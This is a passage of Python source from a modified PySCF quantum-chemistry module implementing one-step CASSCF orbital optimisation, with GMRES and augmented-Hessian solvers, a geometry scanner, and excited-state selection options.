        return True, e_tot, e_cas, fcivec, mo, mo_energy

    if conv_tol_grad is None:
        conv_tol_grad = numpy.sqrt(tol)
        logger.info(casscf, 'Set conv_tol_grad to %g', conv_tol_grad)
    conv_tol_ddm = conv_tol_grad * 5
    conv = False
    totmicro = totinner = 0
    norm_gorb = norm_gci = -1
    de, elast = e_tot, e_tot
    r0 = None

    #Lan generates targeted rdms
    if(casscf.is_select_state):
        rdm1Target_AO = addons.make_rdm12(casscf, mo, fcivec) #, rdm2Target_AO
        #casdm1Target, casdm2Target = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)

    t1m = log.timer('Initializing 1-step CASSCF', *cput0)
    casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
    norm_ddm = 1e2
    casdm1_prev = casdm1_last = casdm1
    t3m = t2m = log.timer('CAS DM', *t1m)
    imacro = 0
    dr0 = None
    while not conv and imacro < casscf.max_cycle_macro:
        imacro += 1
        njk = 0
        omega = e_tot
        casdm1_old = casdm1
        #casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
        max_cycle_micro = casscf.micro_cycle_scheduler(locals())
        max_stepsize = casscf.max_stepsize_scheduler(locals())
        imicro = 0
        if(casscf.is_use_gmres):
            # --- GMRES orbital-rotation branch ---
            print("Using GMRES")
            for imicro in range(max_cycle_micro):
                imicro += 1
                print('imicro', imicro)
                u, g_orb = casscf.rotate_orb_gmres(mo, lambda:fcivec, lambda:casdm1, lambda:casdm2,
                                                   eris, imacro, r0, conv_tol_grad*.3, max_stepsize, log)
                norm_gorb = numpy.linalg.norm(g_orb)
                log.debug(' |g|=%5.3g', norm_gorb)
                if imicro == 1:
                    norm_gorb0 = norm_gorb
                norm_t = numpy.linalg.norm(u-numpy.eye(nmo))
                t3m = log.timer('orbital rotation', *t3m)
                if imicro >= max_cycle_micro:
                    log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g',
                              imicro, norm_t, norm_gorb)
                    break

                # Approximate CI/DM response to the orbital rotation u.
                casdm1, casdm2, gci, fcivec = \
                    casscf.update_casdm(mo, u, fcivec, e_cas, eris, locals())
                norm_ddm = numpy.linalg.norm(casdm1 - casdm1_last)
                norm_ddm_micro = numpy.linalg.norm(casdm1 - casdm1_prev)
                casdm1_prev = casdm1
                t3m = log.timer('update CAS DM', *t3m)
                if isinstance(gci, numpy.ndarray):
                    norm_gci = numpy.linalg.norm(gci)
                    log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%5.3g |ddm|=%5.3g',
                              imicro, norm_t, norm_gorb, norm_gci, norm_ddm)
                else:
                    norm_gci = None
                    log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%s |ddm|=%5.3g',
                              imicro, norm_t, norm_gorb, norm_gci, norm_ddm)

                if callable(callback):
                    callback(locals())

                t3m = log.timer('micro iter %d'%imicro, *t3m)
                #if (norm_t < conv_tol_grad or
                #    (norm_gorb < conv_tol_grad*.5 and
                #     (norm_ddm < conv_tol_ddm*.4 or norm_ddm_micro < conv_tol_ddm*.4))):
                #    break

            # NOTE(review): unlike the AH branch below, the mo update here is
            # commented out, so this driver never rotates mo in GMRES mode --
            # confirm rotate_orb_gmres applies the rotation internally.
            #eris = None
            #u = u.copy()
            #g_orb = g_orb.copy()
            #mo = casscf.rotate_mo(mo, u, log=None)
            #eris = casscf.ao2mo(mo)
            #t3m = log.timer('update eri', *t3m)
            ##norm_t = numpy.linalg.norm(u-numpy.eye(nmo))
            ##de = numpy.dot(casscf.pack_uniq_var(u), g_orb)
            ##save current imicro
            #norm_gorb_old = norm_gorb
            #u_old = u
            #g_orb_old = g_orb
            #if norm_gorb < 1e-04: #norm_t < 1e-4 or abs(de) < tol*.4 or
            #    break
            #print "new molecular orbitals"
            #from pyscf import tools
            #tools.dump_mat.dump_mo(casscf.mol, mo, label=casscf.mol.ao_labels(), digits=6)
            #if imacro%5 == 0:
            #    fname='mo_iter_'+str(imacro)+'.txt'
            #    with open(fname, 'w') as f:
            #        for i in range(mo.shape[0]):
            #            for j in range(mo.shape[1]):
            #                f.write(" %20.10f" % mo[i,j])
            #            f.write("\n")
        else:
            # --- Augmented-hessian (Davidson) branch ---
            rota = casscf.rotate_orb_cc(mo, lambda:fcivec, lambda:casdm1, lambda:casdm2,
                                        eris, r0, conv_tol_grad*.3, max_stepsize, log)
            for u, g_orb, njk, r0 in rota:
                imicro += 1
                norm_gorb = numpy.linalg.norm(g_orb)
                if imicro == 1:
                    norm_gorb0 = norm_gorb
                norm_t = numpy.linalg.norm(u-numpy.eye(nmo))
                t3m = log.timer('orbital rotation', *t3m)
                if imicro >= max_cycle_micro:
                    log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g',
                              imicro, norm_t, norm_gorb)
                    break

                casdm1, casdm2, gci, fcivec = \
                    casscf.update_casdm(mo, u, fcivec, e_cas, eris, locals())
                norm_ddm = numpy.linalg.norm(casdm1 - casdm1_last)
                norm_ddm_micro = numpy.linalg.norm(casdm1 - casdm1_prev)
                casdm1_prev = casdm1
                t3m = log.timer('update CAS DM', *t3m)
                if isinstance(gci, numpy.ndarray):
                    norm_gci = numpy.linalg.norm(gci)
                    log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%5.3g |ddm|=%5.3g',
                              imicro, norm_t, norm_gorb, norm_gci, norm_ddm)
                else:
                    norm_gci = None
                    log.debug('micro %d |u-1|=%5.3g |g[o]|=%5.3g |g[c]|=%s |ddm|=%5.3g',
                              imicro, norm_t, norm_gorb, norm_gci, norm_ddm)

                if callable(callback):
                    callback(locals())

                t3m = log.timer('micro iter %d'%imicro, *t3m)
                if (norm_t < conv_tol_grad or
                    (norm_gorb < conv_tol_grad*.5 and
                     (norm_ddm < conv_tol_ddm*.4 or norm_ddm_micro < conv_tol_ddm*.4))):
                    break

            rota.close()
            rota = None

            eris = None
            # keep u, g_orb in locals() so that they can be accessed by callback
            u = u.copy()
            g_orb = g_orb.copy()
            mo = casscf.rotate_mo(mo, u, log)
            eris = casscf.ao2mo(mo)
            t2m = log.timer('update eri', *t3m)

        totmicro += imicro
        totinner += njk

        # Archive the selected-CI output of this macro iteration.
        if casscf.is_use_sCI and casscf.is_save_sCIout:
            if os.path.exists("output.dat"):
                import shutil
                if os.environ.get("cycle") is not None:
                    icycle = int(os.environ["cycle"])+1
                    shutil.copyfile("output.dat","output_"+str(icycle)+"_"+str(imacro)+".dat")
                else:
                    shutil.copyfile("output.dat","output_"+str(imacro)+".dat")

        # Re-solve the CASCI problem at the rotated orbitals.
        e_tot, e_cas, fcivec = casscf.casci(mo, fcivec, eris, log, locals())
        casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, casscf.ncas, casscf.nelecas)
        norm_ddm = numpy.linalg.norm(casdm1 - casdm1_last)
        casdm1_prev = casdm1_last = casdm1
        log.timer('CASCI solver', *t2m)
        t3m = t2m = t1m = log.timer('macro iter %d'%imacro, *t1m)

        de, elast = e_tot - elast, e_tot
        #print "AAAAAAAAAAAA ", tol, conv_tol_grad, conv_tol_ddm
        #print "BBBBBBBBBBBB ", abs(de), norm_gorb0, norm_ddm
        # Converged when energy change, orbital gradient and 1-RDM change
        # are all below threshold.
        if (abs(de) < tol
            and (norm_gorb0 < conv_tol_grad and norm_ddm < conv_tol_ddm)):
            conv = True

        if dump_chk:
            casscf.dump_chk(locals())

        if callable(callback):
            callback(locals())

    if conv:
        log.info('1-step CASSCF converged in %d macro (%d JK %d micro) steps',
                 imacro, totinner, totmicro)
    else:
        log.info('1-step CASSCF not converged, %d macro (%d JK %d micro) steps',
                 imacro, totinner, totmicro)

    if casscf.canonicalization:
        log.info('CASSCF canonicalization')
        mo, fcivec, mo_energy = \
            casscf.canonicalize(mo, fcivec, eris, casscf.sorting_mo_energy,
                                casscf.natorb, casdm1, log)
        if casscf.natorb and dump_chk: # dump_chk may save casdm1
            nocc = casscf.ncore + casscf.ncas
            occ, ucas = casscf._eig(-casdm1, casscf.ncore, nocc)
            casdm1 = numpy.diag(-occ)
    else:
        mo_energy = None

    if dump_chk:
        casscf.dump_chk(locals())

    log.timer('1-step CASSCF', *cput0)
    return conv, e_tot, e_cas, fcivec, mo, mo_energy
def as_scanner(mc, envs=None): #, mo_fname=None):
    '''Generating a scanner for CASSCF PES.

    The returned solver is a function. This function requires one argument
    "mol" as input and returns total CASSCF energy.

    The solver will automatically use the results of last calculation as the
    initial guess of the new calculation.  All parameters of MCSCF object
    (conv_tol, max_memory etc) are automatically applied in the solver.

    Note scanner has side effects.  It may change many underlying objects
    (_scf, with_df, with_x2c, ...) during calculation.

    Examples:

    >>> from pyscf import gto, scf, mcscf
    >>> mol = gto.M(atom='N 0 0 0; N 0 0 1.2', verbose=0)
    >>> mc_scanner = mcscf.CASSCF(scf.RHF(mol), 4, 4).as_scanner()
    >>> e = mc_scanner(gto.M(atom='N 0 0 0; N 0 0 1.1'))
    >>> e = mc_scanner(gto.M(atom='N 0 0 0; N 0 0 1.5'))
    '''
    from pyscf.mcscf.addons import project_init_guess
    if isinstance(mc, lib.SinglePointScanner):
        return mc

    logger.info(mc, 'Create scanner for %s', mc.__class__)

    def write_mat(y, fname, ut=False):
        # Dump a scalar, vector or matrix to a text file, one matrix row per
        # line; with ut=True only the upper triangle is written.
        # NOTE(review): this helper is never referenced in this function --
        # apparently left over from debugging.
        x = y
        # Promote scalars (python or numpy) to a 1x1 matrix.
        if type(y) == type(1) or type(y) == type(1.0) or type(y) == type(numpy.array([1.0])[0]) or type(y) == type(numpy.array([1])[0]):
            x = numpy.array([[ 1.0 * y ]])
        elif len(y.shape) == 1:
            x = numpy.reshape(y, [y.size,1])
        with open(fname, 'w') as f:
            for i in range(x.shape[0]):
                for j in range(x.shape[1]):
                    if j >= i or not ut:
                        f.write(" %20.10f" % x[i,j])
                    else:
                        f.write(" %20s" % " ")
                f.write("\n")

    class CASSCF_Scanner(mc.__class__, lib.SinglePointScanner):
        def __init__(self, mc):
            self.__dict__.update(mc.__dict__)
            self._scf = mc._scf.as_scanner()

        def __call__(self, mol_or_geom, **kwargs):
            # Accept either a Mole object or a raw geometry specification.
            if isinstance(mol_or_geom, gto.Mole):
                mol = mol_or_geom
            else:
                mol = self.mol.set_geom_(mol_or_geom, inplace=False)

            # Converge the underlying SCF at the new geometry first.
            mf_scanner = self._scf
            mf_scanner(mol)
            self.mol = mol
            if (self.mo_coeff is None):
                print("we are using HF orbitals")
                mo = mf_scanner.mo_coeff
            else:
                print("we are using predefined orbitals")
                mo = self.mo_coeff
            #geom_cycle = int(os.environ["cycle"])+1
            #if geom_cycle == 1:
            #    mo_coeff_fix = mo
            #else:
            #    print "we are using the fixed MOs"
            #    mo = mo_coeff_fix
            # Project the previous orbitals onto the new geometry's basis.
            mo = project_init_guess(self, mo)
            #print "envs[cycle]", envs['cycle']
            #Lan: optimizing excited state
            if(self.is_select_state):
                print("You are optimizing your selected state")
                #if os.environ.get("cycle") is not None:
                #    geom_cycle = int(os.environ["cycle"])+1
                #    if geom_cycle > 1:
                #        print "Using SA as initial guess of SS"
                #        nroots = 4 #self.fcisolver.nroots
                #        w = 1./nroots
                #        #w = 1./7
                #
                #        mc_sa = CASSCF(mol, self.ncas, self.nelecas, frozen=None)
                #        mc_sa.fcisolver = fci.solver(mol, singlet=True)
                #        #mc_sa.fcisolver.wfnsym = 1 #self.fcisolver.wfnsym
                #        #mc_sa = addons.state_average_(mc_sa, (w,w,0,0,0,w,w,w,w,w)) #nroots*(w,)) #
                #        mc_sa = addons.state_average_(mc_sa, nroots*(w,)) #
                #        mc_sa.is_use_gmres = True
                #        mc_sa.gmres_hess_shift=0.2
                #        mc_sa.is_select_state = False
                #        mc_sa.mo_coeff = mf_scanner.mo_coeff
                #        mc_sa.mc1step()
                #        mo = mc_sa.mo_coeff
                #        #e_tot = self.mc2step(mo, self.ci)[0]
                e_tot = self.mc1step(mo, self.ci)[0]
                #from pyscf import molden
                #with open('geomopt_'+str(geom_cycle)+'.molden', 'w') as f:
                #    molden.header(mol,f)
                #    molden.orbital_coeff(self.mol, f, self.mo_coeff)
            elif(self.sa_geom_opt):
                # State-averaged orbitals, then a state-specific 2-step solve.
                print()
                print("WARN: you are optimizing geometry using SA-CASSCF orbitals w/o solving Z-vector equation!!!")
                nroots = self.fcisolver.nroots
                w = 1./nroots
                mc_sa = CASSCF(mol, self.ncas, self.nelecas, frozen=None)
                #cas_list = [25,27,28,29,30,31,32,33,34,37,43]
                #geom_cycle = int(os.environ["cycle"])+1
                #mc_sa.mo_coeff = addons.sort_mo(mc_sa, mo, cas_list)
                mc_sa.fcisolver = fci.solver(mol, singlet=True)
                mc_sa = addons.state_average_(mc_sa, nroots*(w,))
                mc_sa.is_select_state = False
                #mc_sa.is_use_gmres = True
                #mc_sa.gmres_hess_shift=0.2
                mc_sa.kernel(mo)
                mo = mc_sa.mo_coeff
                e_tot = self.mc2step(mo, self.ci)[0]
            else:
                e_tot = self.kernel(mo, self.ci)[0]
            return e_tot
    return CASSCF_Scanner(mc)
# To extend CASSCF for certain CAS space solver, it can be done by assign an
# object or a module to CASSCF.fcisolver. The fcisolver object or module
# should at least have three member functions "kernel" (wfn for given
# hamiltonain), "make_rdm12" (1- and 2-pdm), "absorb_h1e" (effective
# 2e-hamiltonain) in 1-step CASSCF solver, and two member functions "kernel"
# and "make_rdm12" in 2-step CASSCF solver
class CASSCF(casci.CASCI):
__doc__ = casci.CASCI.__doc__ + '''CASSCF
Extra attributes for CASSCF:
conv_tol : float
Converge threshold. Default is 1e-7
conv_tol_grad : float
Converge threshold for CI gradients and orbital rotation gradients.
Default is 1e-4
max_stepsize : float
The step size for orbital rotation. Small step (0.005 - 0.05) is prefered.
Default is 0.03.
max_cycle_macro : int
Max number of macro iterations. Default is 50.
max_cycle_micro : int
Max number of micro iterations in each macro iteration. Depending on
systems, increasing this value might reduce the total macro
iterations. Generally, 2 - 5 steps should be enough. Default is 3.
ah_level_shift : float, for AH solver.
Level shift for the Davidson diagonalization in AH solver. Default is 1e-8.
ah_conv_tol : float, for AH solver.
converge threshold for AH solver. Default is 1e-12.
ah_max_cycle : float, for AH solver.
Max number of iterations allowd in AH solver. Default is 30.
ah_lindep : float, for AH solver.
Linear dependence threshold for AH solver. Default is 1e-14.
ah_start_tol : flat, for AH solver.
In AH solver, the orbital rotation is started without completely solving the AH problem.
This value is to control the start point. Default is 0.2.
ah_start_cycle : int, for AH solver.
In AH solver, the orbital rotation is started without completely solving the AH problem.
This value is to control the start point. Default is 2.
``ah_conv_tol``, ``ah_max_cycle``, ``ah_lindep``, ``ah_start_tol`` and ``ah_start_cycle``
can affect the accuracy and performance of CASSCF solver. Lower
``ah_conv_tol`` and ``ah_lindep`` might improve the accuracy of CASSCF
optimization, but decrease the performance.
>>> from pyscf import gto, scf, mcscf
>>> mol = gto.M(atom='N 0 0 0; N 0 0 1', basis='ccpvdz', verbose=0)
>>> mf = scf.UHF(mol)
>>> mf.scf()
>>> mc = mcscf.CASSCF(mf, 6, 6)
>>> mc.conv_tol = 1e-10
>>> mc.ah_conv_tol = 1e-5
>>> mc.kernel()[0]
-109.044401898486001
>>> mc.ah_conv_tol = 1e-10
>>> mc.kernel()[0]
-109.044401887945668
chkfile : str
Checkpoint file to save the intermediate orbitals during the CASSCF optimization.
Default is the checkpoint file of mean field object.
ci_response_space : int
subspace size to solve the CI vector response. Default is 3.
callback : function(envs_dict) => None
callback function takes one dict as the argument which is
generated by the builtin function :func:`locals`, so that the
callback function can access all local variables in the current
envrionment.
Saved results
e_tot : float
Total MCSCF energy (electronic energy plus nuclear repulsion)
e_cas : float
CAS space FCI energy
ci : ndarray
CAS space FCI coefficients
mo_coeff : ndarray
Optimized CASSCF orbitals coefficients. When canonicalization is
specified, the returned orbitals make the general Fock matrix
(Fock operator on top of MCSCF 1-particle density matrix)
diagonalized within each subspace (core, active, external).
If natorb (natural orbitals in active space) is specified,
the active segment of the mo_coeff is natural orbitls.
mo_energy : ndarray
Diagonal elements of general Fock matrix (in mo_coeff
representation).
Examples:
>>> from pyscf import gto, scf, mcscf
>>> mol = gto.M(atom='N 0 0 0; N 0 0 1', basis='ccpvdz', verbose=0)
>>> mf = scf.RHF(mol)
>>> mf.scf()
>>> mc = mcscf.CASSCF(mf, 6, 6)
>>> mc.kernel()[0]
-109.044401882238134
'''
# the max orbital rotation and CI increment, prefer small step size
max_stepsize = getattr(__config__, 'mcscf_mc1step_CASSCF_max_stepsize', .02)
max_cycle_macro = getattr(__config__, 'mcscf_mc1step_CASSCF_max_cycle_macro', 50)
max_cycle_micro = getattr(__config__, 'mcscf_mc1step_CASSCF_max_cycle_micro', 1)
conv_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_conv_tol', 5e-6)
conv_tol_grad = getattr(__config__, 'mcscf_mc1step_CASSCF_conv_tol_grad', 5e-04)
# for augmented hessian
ah_level_shift = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_level_shift', 1e-8)
ah_conv_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_conv_tol', 1e-12)
ah_max_cycle = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_max_cycle', 30)
ah_lindep = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_lindep', 1e-14)
# * ah_start_tol and ah_start_cycle control the start point to use AH step.
# In function rotate_orb_cc, the orbital rotation is carried out with the
# approximate aug_hessian step after a few davidson updates of the AH eigen
# problem. Reducing ah_start_tol or increasing ah_start_cycle will delay
# the start point of orbital rotation.
# * We can do early ah_start since it only affect the first few iterations.
# The start tol will be reduced when approach the convergence point.
# * Be careful with the SYMMETRY BROKEN caused by ah_start_tol/ah_start_cycle.
# ah_start_tol/ah_start_cycle actually approximates the hessian to reduce
# the J/K evaluation required by AH. When the system symmetry is higher
# than the one given by mol.symmetry/mol.groupname, symmetry broken might
# occur due to this approximation, e.g. with the default ah_start_tol,
# C2 (16o, 8e) under D2h symmetry might break the degeneracy between
# pi_x, pi_y orbitals since pi_x, pi_y belong to different irreps. It can
# be fixed by increasing the accuracy of AH solver, e.g.
# ah_start_tol = 1e-8; ah_conv_tol = 1e-10
# * Classic AH can be simulated by setting eg
# ah_start_tol = 1e-7
# max_stepsize = 1.5
# ah_grad_trust_region = 1e6
# ah_grad_trust_region allow gradients being increased in AH optimization
ah_start_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_start_tol', 2.5)
ah_start_cycle = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_start_cycle', 3)
ah_grad_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_ah_grad_trust_region', 3.0)
internal_rotation = getattr(__config__, 'mcscf_mc1step_CASSCF_internal_rotation', False)
ci_response_space = getattr(__config__, 'mcscf_mc1step_CASSCF_ci_response_space', 4)
ci_grad_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_ci_grad_trust_region', 3)
with_dep4 = getattr(__config__, 'mcscf_mc1step_CASSCF_with_dep4', False)
chk_ci = getattr(__config__, 'mcscf_mc1step_CASSCF_chk_ci', False)
kf_interval = getattr(__config__, 'mcscf_mc1step_CASSCF_kf_interval', 4)
kf_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_kf_trust_region', 3.0)
ao2mo_level = getattr(__config__, 'mcscf_mc1step_CASSCF_ao2mo_level', 2)
natorb = getattr(__config__, 'mcscf_mc1step_CASSCF_natorb', False)
canonicalization = getattr(__config__, 'mcscf_mc1step_CASSCF_canonicalization', True)
sorting_mo_energy = getattr(__config__, 'mcscf_mc1step_CASSCF_sorting_mo_energy', False)
# Lan's options are below:
#for selecting excited state
target_state = getattr(__config__, 'mcscf_mc1step_CASSCF_target_state', 0)
target_state_spin = getattr(__config__, 'mcscf_mc1step_CASSCF_target_state_spin', 0)
is_select_state = getattr(__config__, 'mcscf_mc1step_CASSCF_is_select_state', True)
is_target_dipole = getattr(__config__, 'mcscf_mc1step_CASSCF_is_target_dipole', False)
sa_geom_opt = getattr(__config__, 'state-averaging geometry optimization w/o Z-vector', False)
#for GMRES and line search
is_use_gmres = getattr(__config__, 'mcscf_mc1step_CASSCF_is_use_gmres', False)
gmres_conv_tol = getattr(__config__, 'mcscf_mc1step_CASSCF_gmres_conv_tol', 1e-06)
gmres_max_cycle = getattr(__config__, 'mcscf_mc1step_CASSCF_gmres_max_cycle', 100)
gmres_hess_shift = getattr(__config__, 'mcscf_mc1step_CASSCF_gmres_hess_shift', 0.)
is_gmres_trust_region = getattr(__config__, 'mcscf_mc1step_CASSCF_is_gmres_precond', True)
is_gmres_precond = getattr(__config__, 'mcscf_mc1step_CASSCF_is_gmres_precond', True)
is_gmres_conv_dynm = getattr(__config__, 'mcscf_mc1step_CASSCF_is_gmres_conv_dynm', False)
is_line_search = getattr(__config__, 'mcscf_mc1step_CASSCF_is_line_search', False)
is_only_ddm = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_ddm', False)
is_only_W = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_W', False)
is_only_H2 = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_H2', False)
is_only_E = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_E', False)
is_only_dipole = getattr(__config__, 'mcscf_mc1step_CASSCF_is_only_dipole', False)
is_ddm_and_dipole = getattr(__config__, 'mcscf_mc1step_CASSCF_is_ddm_and_dipole', False)
#for sCI
is_use_sCI = getattr(__config__, 'mcscf_mc1step_CASSCF_is_use_sCI', False)
is_save_sCIout = getattr(__config__, 'mcscf_mc1step_CASSCF_is_save_sCIout', False)
def __init__(self, mf_or_mol, ncas, nelecas, ncore=None, frozen=None):
casci.CASCI.__init__(self, mf_or_mol, ncas, nelecas, ncore)
self.frozen = frozen
self.callback = None
self.chkfile = self._scf.chkfile
self.fcisolver.max_cycle = getattr(__config__,
'mcscf_mc1step_CASSCF_fcisolver_max_cycle', 50)
self.fcisolver.conv_tol = getattr(__config__,
'mcscf_mc1step_CASSCF_fcisolver_conv_tol', 1e-8)
##################################################
# don't modify the following attributes, they are not input options
self.e_tot = None
self.e_cas = None
self.ci = None
self.mo_coeff = self._scf.mo_coeff
self.mo_energy = self._scf.mo_energy
self.converged = False
self._max_stepsize = None
keys = set(('max_stepsize', 'max_cycle_macro', 'max_cycle_micro',
'conv_tol', 'conv_tol_grad', 'ah_level_shift',
'ah_conv_tol', 'ah_max_cycle', 'ah_lindep',
'ah_start_tol', 'ah_start_cycle', 'ah_grad_trust_region',
'internal_rotation', 'ci_response_space',
'ci_grad_trust_region', 'with_dep4', 'chk_ci',
'kf_interval', 'kf_trust_region', 'fcisolver_max_cycle',
'fcisolver_conv_tol', 'natorb', 'canonicalization',
'sorting_mo_energy', 'is_use_gmres', 'gmres_conv_tol',
'gmres_max_cycle', 'gmres_hess_shift', 'is_gmres_trust_region',
'is_gmres_precond', 'is_gmres_conv_dynm',
'is_line_search', 'is_only_ddm', 'is_only_W','is_only_H2', 'is_only_E', 'is_only_dipole', 'is_ddm_and_dipole',
'target_state', 'is_select_state', 'is_target_dipole', 'sa_geom_opt',
'target_state_spin', 'is_use_sCI', 'is_save_sCIout'))
self._keys = set(self.__dict__.keys()).union(keys)
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
log.info('')
log.info('******** %s ********', self.__class__)
nvir = self.mo_coeff.shape[1] - self.ncore - self.ncas
log.info('CAS (%de+%de, %do), ncore = %d, nvir = %d', \
self.nelecas[0], self.nelecas[1], self.ncas, self.ncore, nvir)
assert(self.ncas > 0)
if self.frozen is not None:
log.info('frozen orbitals %s', str(self.frozen))
log.info('max_cycle_macro = %d', self.max_cycle_macro)
log.info('max_cycle_micro = %d', self.max_cycle_micro)
log.info('conv_tol = %g', self.conv_tol)
log.info('conv_tol_grad = %s', self.conv_tol_grad)
log.info('ci_response_space = %d', self.ci_response_space)
log.info('ci_grad_trust_region = %d', self.ci_grad_trust_region)
log.info('kf_trust_region = %g', self.kf_trust_region)
log.info('kf_interval = %d', self.kf_interval)
if not self.is_use_gmres:
log.info('orbital rotation max_stepsize = %g', self.max_stepsize)
log.info('augmented hessian ah_max_cycle = %d', self.ah_max_cycle)
log.info('augmented hessian ah_conv_tol = %g', self.ah_conv_tol)
log.info('augmented hessian ah_linear dependence = %g', self.ah_lindep)
log.info('augmented hessian ah_level shift = %d', self.ah_level_shift)
log.info('augmented hessian ah_start_tol = %g', self.ah_start_tol)
log.info('augmented hessian ah_start_cycle = %d', self.ah_start_cycle)
log.info('augmented hessian ah_grad_trust_region = %g', self.ah_grad_trust_region)
else:
log.info('is_select_state = %s', self.is_select_state)
if self.is_select_state:
log.info('is_target_dipole = %s', self.is_select_state)
log.info('is_only_ddm = %s', self.is_only_ddm)
log.info('is_only_W = %s', self.is_only_W)
log.info('is_only_H2 = %s', self.is_only_H2)
log.info('is_only_E = %s', self.is_only_E)
log.info('is_only_dipole = %s', self.is_only_dipole)
log.info('is_ddm_and_dipole = %s', self.is_ddm_and_dipole)
log.info('gmres_max_cycle = %d', self.gmres_max_cycle)
if not self.is_gmres_conv_dynm:
log.info('gmres_conv_tol = %g', self.gmres_conv_tol)
log.info('gmres_hess_shift = %g', self.gmres_hess_shift)
log.info('is_gmres_precond = %s', self.is_gmres_precond)
log.info('is_gmres_trust_region = %s', self.is_gmres_trust_region)
log.info('is_gmres_conv_dynm = %s', self.is_gmres_conv_dynm)
log.info('is_line_search = %s', self.is_line_search)
log.info('with_dep4 %d', self.with_dep4)
log.info('natorb = %s', self.natorb)
log.info('canonicalization = %s', self.canonicalization)
log.info('sorting_mo_energy = %s', self.sorting_mo_energy)
log.info('ao2mo_level = %d', self.ao2mo_level)
log.info('chkfile = %s', self.chkfile)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
log.info('internal_rotation = %s', self.internal_rotation)
if getattr(self.fcisolver, 'dump_flags', None):
self.fcisolver.dump_flags(self.verbose)
if self.mo_coeff is None:
log.error('Orbitals for CASCI are not specified. The relevant SCF '
'object may not be initialized.')
if (getattr(self._scf, 'with_solvent', None) and
not getattr(self, 'with_solvent', None)):
log.warn('''Solvent model %s was found in SCF object.
It is not applied to the CASSCF object. The CASSCF result is not affected by the SCF solvent model.
To enable the solvent model for CASSCF, a decoration to CASSCF object as below needs be called
from pyscf import solvent
mc = mcscf.CASSCF(...)
mc = solvent.ddCOSMO(mc)
''',
self._scf.with_solvent.__class__)
return self
def kernel(self, mo_coeff=None, ci0=None, callback=None, _kern=kernel):
'''
Returns:
Five elements, they are
total energy,
active space CI energy,
the active space FCI wavefunction coefficients or DMRG wavefunction ID,
the MCSCF canonical orbital coefficients,
the MCSCF canonical orbital coefficients.
They are attributes of mcscf object, which can be accessed by
.e_tot, .e_cas, .ci, .mo_coeff, .mo_energy
'''
if mo_coeff is None:
mo_coeff = self.mo_coeff
else: # overwrite self.mo_coeff because it is needed in many methods of this class
self.mo_coeff = mo_coeff
if callback is None: callback = self.callback
if self.verbose >= logger.WARN:
self.check_sanity()
self.dump_flags()
self.converged, self.e_tot, self.e_cas, self.ci, \
self.mo_coeff, self.mo_energy = \
_kern(self, mo_coeff,
tol=self.conv_tol, conv_tol_grad=self.conv_tol_grad,
ci0=ci0, callback=callback, verbose=self.verbose)
logger.note(self, 'CASSCF energy = %.15g', self.e_tot)
self._finalize()
return self.e_tot, self.e_cas, self.ci, self.mo_coeff, self.mo_energy
def mc1step(self, mo_coeff=None, ci0=None, callback=None):
    # Alias for kernel(): runs the default 1-step CASSCF driver.
    return self.kernel(mo_coeff, ci0, callback)
def mc2step(self, mo_coeff=None, ci0=None, callback=None):
    # Run the 2-step CASSCF algorithm by passing mc2step's driver as the
    # _kern argument of kernel().
    from pyscf.mcscf import mc2step
    return self.kernel(mo_coeff, ci0, callback, mc2step.kernel)
def casci(self, mo_coeff, ci0=None, eris=None, verbose=None, envs=None):
    """Solve the CASCI problem at the fixed orbitals *mo_coeff*.

    Locally modified version: for multi-root FCI solvers it can select a
    "target" state to optimize (filtered by spin and ranked by similarity
    of the 1-RDM and, optionally, the dipole to the previous geometry)
    instead of always following the lowest root.

    Args:
        mo_coeff: MO coefficients defining core/active/virtual spaces.
        ci0: initial guess for the CI vector(s).
        eris: transformed-integral object; if None the integrals are
            recomputed through get_h2cas.
        verbose: verbosity override for this call.
        envs: dict of local variables from the CASSCF macro-iteration
            scope (used for logging and target-state selection).

    Returns:
        (e_tot, e_cas, fcivec) of the (possibly selected) state.
    """
    log = logger.new_logger(self, verbose)
    if eris is None:
        fcasci = copy.copy(self)
        fcasci.ao2mo = self.get_h2cas
    else:
        # Reuse the integrals already transformed for the orbital step.
        fcasci = _fake_h_for_fast_casci(self, mo_coeff, eris)

    e_tot, e_cas, fcivec = casci.kernel(fcasci, mo_coeff, ci0, log)
    #if not isinstance(e_cas, (float, numpy.number)):
    #    raise RuntimeError('Multiple roots are detected in fcisolver. '
    #                       'CASSCF does not know which state to optimize.\n'
    #                       'See also mcscf.state_average or mcscf.state_specific for excited states.')

    if isinstance(e_tot, (float, numpy.number)):
        # Single-root solver: only logging below.
        if envs is not None and log.verbose >= logger.INFO:
            log.debug('CAS space CI energy = %.15g', e_cas)

            if hasattr(self.fcisolver, 'spin_square'):
                ss = self.fcisolver.spin_square(fcivec, self.ncas, self.nelecas)
            else:
                ss = None

            if 'imicro' in envs:  # Within CASSCF iteration
                if ss is None:
                    log.info('macro iter %d (%d JK %d micro), '
                             'CASSCF E = %.15g dE = %.8g',
                             envs['imacro'], envs['njk'], envs['imicro'],
                             e_tot, e_tot-envs['elast'])
                else:
                    log.info('macro iter %d (%d JK %d micro), '
